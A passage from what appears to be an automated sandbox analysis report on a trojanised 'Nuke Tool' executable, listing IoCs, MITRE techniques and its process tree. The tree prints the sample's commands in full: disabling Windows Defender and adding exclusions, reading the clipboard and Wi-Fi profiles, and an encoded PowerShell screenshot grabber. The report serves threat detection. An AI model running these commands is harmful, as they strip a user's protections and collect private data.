Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202	notepad.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\dnSpy-net-win64.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Nuke Tool discord-gg-kasyno.exe_extracted.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
2500	powershell.exe
2292	powershell.exe
2500	powershell.exe
2292	powershell.exe
1364	powershell.exe
1364	powershell.exe
1364	powershell.exe
3608	powershell.exe
3608	powershell.exe
2872	powershell.exe
2872	powershell.exe
3608	powershell.exe
2872	powershell.exe
2644	powershell.exe
2644	powershell.exe
1620	powershell.exe
1620	powershell.exe
1748	msedge.exe
1748	msedge.exe
2692	msedge.exe
2692	msedge.exe
1468	powershell.exe
1468	powershell.exe
1468	powershell.exe
3144	powershell.exe
3144	powershell.exe
3144	powershell.exe
3904	identity_helper.exe
3904	identity_helper.exe
2276	msedge.exe
2276	msedge.exe
4932	msedge.exe
4932	msedge.exe
3768	msedge.exe
3768	msedge.exe
3768	msedge.exe
3768	msedge.exe
5068	chrome.exe
5068	chrome.exe
5948	msedge.exe
5948	msedge.exe
5124	msedge.exe
5124	msedge.exe
5344	msedge.exe
5344	msedge.exe
3768	msedge.exe
3768	msedge.exe
3008	msedge.exe
3008	msedge.exe
2556	msedge.exe
2556	msedge.exe
128	msedge.exe
128	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 9 IoCs

pid	Process
5948	msedge.exe
5344	msedge.exe
3768	msedge.exe
5336	OpenWith.exe
640	OpenWith.exe
2572	notepad.exe
2556	msedge.exe
128	msedge.exe
2396	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 45 IoCs

pid	Process
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	2400	tasklist.exe
Token: SeDebugPrivilege	1172	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5016	WMIC.exe
Token: SeSecurityPrivilege	5016	WMIC.exe
Token: SeTakeOwnershipPrivilege	5016	WMIC.exe
Token: SeLoadDriverPrivilege	5016	WMIC.exe
Token: SeSystemProfilePrivilege	5016	WMIC.exe
Token: SeSystemtimePrivilege	5016	WMIC.exe
Token: SeProfSingleProcessPrivilege	5016	WMIC.exe
Token: SeIncBasePriorityPrivilege	5016	WMIC.exe
Token: SeCreatePagefilePrivilege	5016	WMIC.exe
Token: SeBackupPrivilege	5016	WMIC.exe
Token: SeRestorePrivilege	5016	WMIC.exe
Token: SeShutdownPrivilege	5016	WMIC.exe
Token: SeDebugPrivilege	5016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5016	WMIC.exe
Token: SeRemoteShutdownPrivilege	5016	WMIC.exe
Token: SeUndockPrivilege	5016	WMIC.exe
Token: SeManageVolumePrivilege	5016	WMIC.exe
Token: 33	5016	WMIC.exe
Token: 34	5016	WMIC.exe
Token: 35	5016	WMIC.exe
Token: 36	5016	WMIC.exe
Token: SeDebugPrivilege	4764	tasklist.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeIncreaseQuotaPrivilege	5016	WMIC.exe
Token: SeSecurityPrivilege	5016	WMIC.exe
Token: SeTakeOwnershipPrivilege	5016	WMIC.exe
Token: SeLoadDriverPrivilege	5016	WMIC.exe
Token: SeSystemProfilePrivilege	5016	WMIC.exe
Token: SeSystemtimePrivilege	5016	WMIC.exe
Token: SeProfSingleProcessPrivilege	5016	WMIC.exe
Token: SeIncBasePriorityPrivilege	5016	WMIC.exe
Token: SeCreatePagefilePrivilege	5016	WMIC.exe
Token: SeBackupPrivilege	5016	WMIC.exe
Token: SeRestorePrivilege	5016	WMIC.exe
Token: SeShutdownPrivilege	5016	WMIC.exe
Token: SeDebugPrivilege	5016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5016	WMIC.exe
Token: SeRemoteShutdownPrivilege	5016	WMIC.exe
Token: SeUndockPrivilege	5016	WMIC.exe
Token: SeManageVolumePrivilege	5016	WMIC.exe
Token: 33	5016	WMIC.exe
Token: 34	5016	WMIC.exe
Token: 35	5016	WMIC.exe
Token: 36	5016	WMIC.exe
Token: SeDebugPrivilege	536	tasklist.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeIncreaseQuotaPrivilege	4308	WMIC.exe
Token: SeSecurityPrivilege	4308	WMIC.exe
Token: SeTakeOwnershipPrivilege	4308	WMIC.exe
Token: SeLoadDriverPrivilege	4308	WMIC.exe
Token: SeSystemProfilePrivilege	4308	WMIC.exe
Token: SeSystemtimePrivilege	4308	WMIC.exe
Token: SeProfSingleProcessPrivilege	4308	WMIC.exe
Token: SeIncBasePriorityPrivilege	4308	WMIC.exe
Token: SeCreatePagefilePrivilege	4308	WMIC.exe
Token: SeBackupPrivilege	4308	WMIC.exe
Token: SeRestorePrivilege	4308	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe

Suspicious use of SendNotifyMessage 36 IoCs

pid	Process
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
5068	chrome.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe
1748	msedge.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
5948	msedge.exe
5948	msedge.exe
5948	msedge.exe
2880	helppane.exe
2880	helppane.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
3768	msedge.exe
3768	msedge.exe
3768	msedge.exe
3768	msedge.exe
3768	msedge.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
5336	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
640	OpenWith.exe
2572	notepad.exe
3008	msedge.exe
3008	msedge.exe
2556	msedge.exe
2556	msedge.exe
2556	msedge.exe
128	msedge.exe
128	msedge.exe
128	msedge.exe
128	msedge.exe
128	msedge.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe
2396	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3508 wrote to memory of 3788	3508	Nuke Tool discord-gg-kasyno.exe	77
PID 3508 wrote to memory of 3788	3508	Nuke Tool discord-gg-kasyno.exe	77
PID 3788 wrote to memory of 4252	3788	Nuke Tool discord-gg-kasyno.exe	78
PID 3788 wrote to memory of 4252	3788	Nuke Tool discord-gg-kasyno.exe	78
PID 3788 wrote to memory of 4920	3788	Nuke Tool discord-gg-kasyno.exe	79
PID 3788 wrote to memory of 4920	3788	Nuke Tool discord-gg-kasyno.exe	79
PID 4252 wrote to memory of 2292	4252	cmd.exe	82
PID 4252 wrote to memory of 2292	4252	cmd.exe	82
PID 4920 wrote to memory of 2500	4920	cmd.exe	83
PID 4920 wrote to memory of 2500	4920	cmd.exe	83
PID 3788 wrote to memory of 4576	3788	Nuke Tool discord-gg-kasyno.exe	84
PID 3788 wrote to memory of 4576	3788	Nuke Tool discord-gg-kasyno.exe	84
PID 3788 wrote to memory of 5040	3788	Nuke Tool discord-gg-kasyno.exe	85
PID 3788 wrote to memory of 5040	3788	Nuke Tool discord-gg-kasyno.exe	85
PID 3788 wrote to memory of 3908	3788	Nuke Tool discord-gg-kasyno.exe	86
PID 3788 wrote to memory of 3908	3788	Nuke Tool discord-gg-kasyno.exe	86
PID 4576 wrote to memory of 1364	4576	cmd.exe	90
PID 4576 wrote to memory of 1364	4576	cmd.exe	90
PID 3908 wrote to memory of 1700	3908	cmd.exe	91
PID 3908 wrote to memory of 1700	3908	cmd.exe	91
PID 3788 wrote to memory of 1968	3788	Nuke Tool discord-gg-kasyno.exe	93
PID 3788 wrote to memory of 1968	3788	Nuke Tool discord-gg-kasyno.exe	93
PID 3788 wrote to memory of 1872	3788	Nuke Tool discord-gg-kasyno.exe	94
PID 3788 wrote to memory of 1872	3788	Nuke Tool discord-gg-kasyno.exe	94
PID 5040 wrote to memory of 1944	5040	cmd.exe	92
PID 5040 wrote to memory of 1944	5040	cmd.exe	92
PID 3788 wrote to memory of 2076	3788	Nuke Tool discord-gg-kasyno.exe	98
PID 3788 wrote to memory of 2076	3788	Nuke Tool discord-gg-kasyno.exe	98
PID 3788 wrote to memory of 3696	3788	Nuke Tool discord-gg-kasyno.exe	99
PID 3788 wrote to memory of 3696	3788	Nuke Tool discord-gg-kasyno.exe	99
PID 3788 wrote to memory of 3604	3788	Nuke Tool discord-gg-kasyno.exe	101
PID 3788 wrote to memory of 3604	3788	Nuke Tool discord-gg-kasyno.exe	101
PID 1872 wrote to memory of 1172	1872	cmd.exe	103
PID 1872 wrote to memory of 1172	1872	cmd.exe	103
PID 3788 wrote to memory of 3320	3788	Nuke Tool discord-gg-kasyno.exe	104
PID 3788 wrote to memory of 3320	3788	Nuke Tool discord-gg-kasyno.exe	104
PID 1968 wrote to memory of 2400	1968	cmd.exe	175
PID 1968 wrote to memory of 2400	1968	cmd.exe	175
PID 3788 wrote to memory of 4816	3788	Nuke Tool discord-gg-kasyno.exe	106
PID 3788 wrote to memory of 4816	3788	Nuke Tool discord-gg-kasyno.exe	106
PID 3788 wrote to memory of 4912	3788	Nuke Tool discord-gg-kasyno.exe	109
PID 3788 wrote to memory of 4912	3788	Nuke Tool discord-gg-kasyno.exe	109
PID 3788 wrote to memory of 4536	3788	Nuke Tool discord-gg-kasyno.exe	111
PID 3788 wrote to memory of 4536	3788	Nuke Tool discord-gg-kasyno.exe	111
PID 3788 wrote to memory of 3600	3788	Nuke Tool discord-gg-kasyno.exe	113
PID 3788 wrote to memory of 3600	3788	Nuke Tool discord-gg-kasyno.exe	113
PID 3320 wrote to memory of 3944	3320	cmd.exe	116
PID 3320 wrote to memory of 3944	3320	cmd.exe	116
PID 3604 wrote to memory of 4764	3604	cmd.exe	118
PID 3604 wrote to memory of 4764	3604	cmd.exe	118
PID 2076 wrote to memory of 5016	2076	cmd.exe	119
PID 2076 wrote to memory of 5016	2076	cmd.exe	119
PID 3696 wrote to memory of 3608	3696	cmd.exe	120
PID 3696 wrote to memory of 3608	3696	cmd.exe	120
PID 4536 wrote to memory of 2460	4536	cmd.exe	121
PID 4536 wrote to memory of 2460	4536	cmd.exe	121
PID 4912 wrote to memory of 3460	4912	cmd.exe	122
PID 4912 wrote to memory of 3460	4912	cmd.exe	122
PID 1944 wrote to memory of 900	1944	bound.exe	123
PID 1944 wrote to memory of 900	1944	bound.exe	123
PID 3600 wrote to memory of 2872	3600	cmd.exe	124
PID 3600 wrote to memory of 2872	3600	cmd.exe	124
PID 4816 wrote to memory of 2084	4816	cmd.exe	125
PID 4816 wrote to memory of 2084	4816	cmd.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
412	attrib.exe
4280	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe
"C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3508
- C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe
  "C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1944
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:900
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ANY ISSUES? T.ME/SWIEZAK', 0, 'THX FOR USING', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3908
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ANY ISSUES? T.ME/SWIEZAK', 0, 'THX FOR USING', 0+16);close()"
      4⤵
      PID:1700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1968
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1872
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3604
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3320
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4536
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
